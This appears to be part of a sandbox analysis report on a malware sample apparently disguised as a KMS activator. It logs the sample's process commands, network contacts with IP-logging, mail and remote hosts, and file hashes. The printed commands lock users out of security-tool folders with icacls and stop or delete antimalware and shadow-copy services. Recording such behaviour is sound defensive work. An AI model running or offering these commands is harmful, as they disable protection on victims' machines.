icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)
C:\Windows\SysWOW64\unsecapp.exe
"C:\Windows\SysWOW64\unsecapp.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
C:\Windows\system32\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\system32\sc.exe
sc delete swprv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\system32\sc.exe
sc stop mbamservice
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\system32\sc.exe
sc stop bytefenceservice
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\system32\sc.exe
sc delete bytefenceservice
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\system32\sc.exe
sc delete mbamservice
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\system32\sc.exe
sc delete crmsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat
C:\Windows\system32\timeout.exe
timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4972,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=604,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
C:\Windows\SysWOW64\unsecapp.exe
"C:\Windows\SysWOW64\unsecapp.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4052,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | kms-auto.site | udp |
| US | 8.8.8.8:53 | kms-auto.site | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.18.66.73:443 | copilot.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 2.18.66.73:443 | copilot.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 172.67.212.241:443 | kms-auto.site | tcp |
| US | 8.8.8.8:53 | cdn.gtranslate.net | udp |
| US | 8.8.8.8:53 | cdn.gtranslate.net | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 104.26.13.42:443 | cdn.gtranslate.net | tcp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| RU | 87.250.250.119:443 | mc.yandex.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 108.177.119.94:443 | update.googleapis.com | tcp |
| GB | 2.18.66.168:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 2.18.66.168:443 | www.bing.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | b-wpi.ru | udp |
| US | 8.8.8.8:53 | b-wpi.ru | udp |
| NL | 46.21.250.137:443 | b-wpi.ru | tcp |
| NL | 46.21.250.137:443 | b-wpi.ru | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| IT | 91.80.49.86:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 104.86.110.120:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| GB | 104.86.110.120:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 172.67.212.241:443 | kms-auto.site | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.66.171:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 13.87.96.169:443 | checkappexec.microsoft.com | tcp |
| IT | 91.80.49.86:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| IT | 91.80.49.86:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| GB | 2.18.66.57:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | studiostaticassetsprod.azureedge.net | udp |
| US | 8.8.8.8:53 | studiostaticassetsprod.azureedge.net | udp |
| US | 13.107.246.64:443 | studiostaticassetsprod.azureedge.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 104.86.110.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| GB | 2.18.66.169:443 | www.bing.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | tcp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| US | 150.171.28.10:443 | c.bing.com | tcp |
| GB | 104.86.110.96:443 | www.bing.com | tcp |
| FR | 52.222.169.76:443 | sb.scorecardresearch.com | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| GB | 2.18.190.182:443 | assets.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | udp |
| GB | 104.86.110.96:443 | www.bing.com | tcp |
| GB | 104.86.110.96:443 | www.bing.com | udp |
| GB | 2.19.252.151:443 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | idserver.xyz | udp |
| US | 104.21.48.1:80 | idserver.xyz | tcp |
| US | 8.8.8.8:53 | iplogger.co | udp |
| US | 172.67.167.249:443 | iplogger.co | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| NL | 173.194.69.94:80 | o.pki.goog | tcp |
| CZ | 91.184.249.83:5655 | | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| IT | 91.80.49.21:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
Files
\??\pipe\crashpad_1188_MFJLFUJCFASNXRBA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 845d842365a2b1d6fc543d5987a8444c |
| SHA1 | d9e74493c371fda8850da9a0daa8bc4f77ec0326 |
| SHA256 | 6f55c946ac04a6258c714365d9a2cd4ac841e695f3be9f04e84310e5d9ab6110 |
| SHA512 | 3fa48469bc4e7d480b7ad5c98a8a3e4e3f210ad986b6aa4e6d8b3a2a0061b2ad7423ac673fb45a435bbdd927f623e3032039b8fbf0aaf5a9ecd98831378562d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 38d6d1d1e45be19825fc28191b82953c |
| SHA1 | 527778930202971fddd2f32a60b25756c2d26c68 |
| SHA256 | 40f0260693f82c5c8425ede2cc137ee3d45eb0c0f0916b67d73b05a5029a49ac |
| SHA512 | ab8588a7ef927c914af3b5c63893e409e3f7de4606ab7f22806198e86085d96a480125cf8153d91a37d4a3fdc088b3256b0282ba664f8eac025d3b9b567c730b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 30e377505ec4f100cf4426003a277efe |
| SHA1 | 5ed7705afda986f6b83977ca7d2c236b05d8764c |
| SHA256 | 3c970ea95256e66c9fddab517a2095c23a528906c30a2f1ff51b7af55081a956 |
| SHA512 | 3fac9fbf41fc5618fdcced6b71c7642afe0d8ff57a462097f76835da68e050a0f97dc9ef043d1bdc4955a6a59e025b85d4f91fd0d9af875ce6c9a68db67bac83 |